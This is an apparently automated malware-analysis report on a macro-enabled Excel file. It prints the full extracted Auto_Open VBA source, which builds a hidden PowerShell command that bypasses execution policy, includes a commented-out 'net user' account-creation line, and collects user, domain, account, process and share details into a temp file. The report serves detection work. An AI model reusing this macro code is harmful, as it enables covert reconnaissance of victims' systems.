Verdict: MALICIOUS
Risk Score: 368
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1070.004 File Deletion
- T1082 System Information Discovery
- T1003 OS Credential Dumping
The Auto_Open VBA macro runs automatically when the document is opened. It builds a hidden, NoProfile, ExecutionPolicy-bypassing PowerShell command that queries Get-CimInstance in the root/SecurityCenter2 namespace for installed antivirus products and pipes the result to a temporary file named 'PSTemp.txt' under %TEMP%; in the extracted source the WScript.Shell call that would run this command is commented out, as is a second command that would add a local user ('net user test test123 /add'), suggesting potential for further malicious actions. The code path that does execute reads user environment variables (username, computer name, user domain, DNS domain, logon server, OS, HTTPS proxy) and uses WMI via GetObject("winmgmts:...") to enumerate local user accounts, members of the local Administrators group, running processes and network shares, appending everything to the same temporary file. The primary intent appears to be reconnaissance and information gathering.
Heuristics (9)

| Finding | Severity | ID | Description |
|---|---|---|---|
| VBA project inside OOXML | medium | OOXML_VBA | Document contains a VBA project (VBA macros present); 8 related findings |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| WScript.Shell usage | critical | OLE_VBA_WSCRIPT | WScript.Shell usage |
| PowerShell reference in VBA | critical | OLE_VBA_PS | PowerShell reference in VBA |
| Auto_Open macro | high | OLE_VBA_AUTO | Auto_Open macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| GetObject call | high | OLE_VBA_GETOBJ | GetObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) |
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4442 bytes | cffa37795a2c5d25fa47850ed53f15fb1d8c3f98b2bda54f1b57e10ef5e16d11 |
Script preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Module1"
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    '
    ' Macro1 Macro
    Dim pscmd As String
    Dim cmde As String
    Dim PS_GetOutput As String
    Dim STxtFile As String
    If STxtFile = "" Then STxtFile = Environ("temp") & "\PSTemp.txt"
    pscmd = "PowerShell -windowstyle hidden -NoProfile -NoLogo -ExecutionPolicy Bypass -Command Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct" & pscmd
    pscmd = pscmd & " | Out-File '" & STxtFile & "' -encoding ASCII"
    'CreateObject("WScript.Shell").Run pscmd, 0, True
    'cmde = "cmd net user test test123 /add" & cmde
    'CreateObject("WScript.Shell").Run cmde
    'User Info Variables
    Dim uname As String
    Dim coname As String
    Dim udomain As String
    Dim Ddomain As String
    Dim DNSdomain As String
    Dim OS As String
    Dim Proxystat As String
    'Gathering User Info
    uname = Environ$("username")
    'MsgBox (uname)
    coname = Environ$("computername")
    udomain = Environ$("userdomain")
    Ddomain = Environ$("userdnsdomain")
    DNSdomain = Environ$("logonServer")
    OS = Environ$("os")
    Proxystat = Environ$("https_proxy")
    'Add the collected details to the txtfile
    Open STxtFile For Append As #1
    Write #1, uname
    Close #1
    Open STxtFile For Append As #2
    Write #2, coname
    Close #2
    Open STxtFile For Append As #3
    Write #3, udomain
    Close #3
    Open STxtFile For Append As #4
    Write #4, Ddomain
    Close #4
    Open STxtFile For Append As #5
    Write #5, DNSdomain
    Close #5
    Open STxtFile For Append As #6
    Write #6, OS
    Close #6
    Open STxtFile For Append As #7
    Write #7, Proxystat
    Close #7
    'Gather Local Users
    sComputerName = "."
    i = 7
    Set oWMIsvc = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & sComputerName & "\root\cimv2")
    Set oWMICUserAcctDetails = oWMIsvc.ExecQuery _
        ("Select * from Win32_UserAccount Where LocalAccount = True")
    For Each oAcct In oWMICUserAcctDetails
        i = i + 1
        Open STxtFile For Append As #i
        Write #i, oAcct.AccountType, oAcct.Caption, oAcct.Description, oAcct.Disabled, oAcct.domain, oAcct.FullName, oAcct.LocalAccount, oAcct.Lockout, oAcct.Name, oAcct.PasswordChangeable, oAcct.PasswordExpires, oAcct.PasswordRequired, oAcct.SID, oAcct.SIDType, oAcct.Status
        Close #i
    Next
    'Gather Admin User
    Set aadmin = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & sComputerName & "\root\cimv2")
    strQuery = "Select * FROM Win32_GroupUser WHERE GroupComponent=" & """" & "Win32_Group.Domain='" & strCName & "',Name='Administrators'" & """"
    Set LocalAdminItems = aadmin.ExecQuery(strQuery)
    Open STxtFile For Append As #1
    Write #1, "Admin Accounts Found"
    Close #1
    For Each Admin In LocalAdminItems
        i = i + 1
        Open STxtFile For Append As #i
        Write #i, Admin.PartComponent
        Close #i
    Next
    'Process Details
    Set objServices = GetObject("winmgmts:\\" & sComputerName & "\root\cimv2")
    Set ObjProcessSet = objServices.ExecQuery("Select * FROM Win32_Process", , 48)
    Open STxtFile For Append As #1
    Write #1, "Process Details"
    Close #1
    For Each Process In ObjProcessSet
        i = i + 1
        Open STxtFile For Append As #i
        Write #i, Process.Name, Process.ProcessId, Process.ExecutablePath
        Close #i
    Next
    'Network Shares
    Open STxtFile For Append As #i
    Write #i, "NetworkShares"
    Close #i
    Set shareItems = objServices.ExecQuery("Select * from Win32_Share")
    For Each share In shareItems
        i = i + 1
        Open STxtFile For Append As #i
        Write #i, share.Name, share.Path
        Close #i
    Next
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerive
```

... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 26624 bytes | 8d257d0c74063d625ab17a17c35ba9cb046e9b7a043c171ec8c8724f0abd32b0 |